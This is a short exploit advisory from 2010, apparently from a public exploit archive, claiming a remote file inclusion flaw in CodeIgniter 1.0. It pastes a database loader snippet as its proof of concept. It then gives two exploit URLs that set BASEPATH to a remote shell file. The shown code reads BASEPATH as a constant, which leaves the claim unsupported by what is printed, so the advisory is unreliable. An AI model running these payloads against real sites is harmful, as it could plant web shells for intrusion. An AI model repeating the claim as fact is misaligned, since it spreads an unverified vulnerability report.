Text :  

###########################################################
### #
### CodeIgniter v1.0 Remote File Inclusion Vulnerability #
### #
###########################################################
###
### * @package CodeIgniter
### * @Version 1.0
### * @license http://codeigniter.com/user_guide/license.html
### * @link http://codeigniter.com
###
###########################################################
###
### Type : Remote File Inclusion Vulnerability
### Author: eidelweiss
### Date : 2010-02-13
### Location: Indonesia ( http://yogyacarderlink.web.id )
### Contact: g1xsystem [at] windowslive [dot] com
### Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal (C)yber
###
###########################################################

POC:
require_once(BASEPATH.'database/DB_driver'.EXT);

if ( ! isset($active_record) OR $active_record == TRUE)
{
require_once(BASEPATH.'database/DB_active_rec'.EXT);

if ( ! class_exists('CI_DB'))
{
eval('class CI_DB extends CI_DB_active_record { }');
}
}
else
{
if ( ! class_exists('CI_DB'))
{
eval('class CI_DB extends CI_DB_driver { }');
}
}

require_once(BASEPATH.'database/drivers/'.$params['dbdriver'].'/'.$params['
dbdriver'].'_driver'.EXT);

// Instantiate the DB adapter
$driver = 'CI_DB_'.$params['dbdriver'].'_driver';
$DB =& instantiate_class(new $driver($params));

if ($DB->autoinit == TRUE)
{
$DB->initialize();
}

return $DB;
}

###########################################################
### Exploit: /system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
### /system/database/DB_driver.php?BASEPATH=[Shell.txt?]
###########################################################

  References :  

None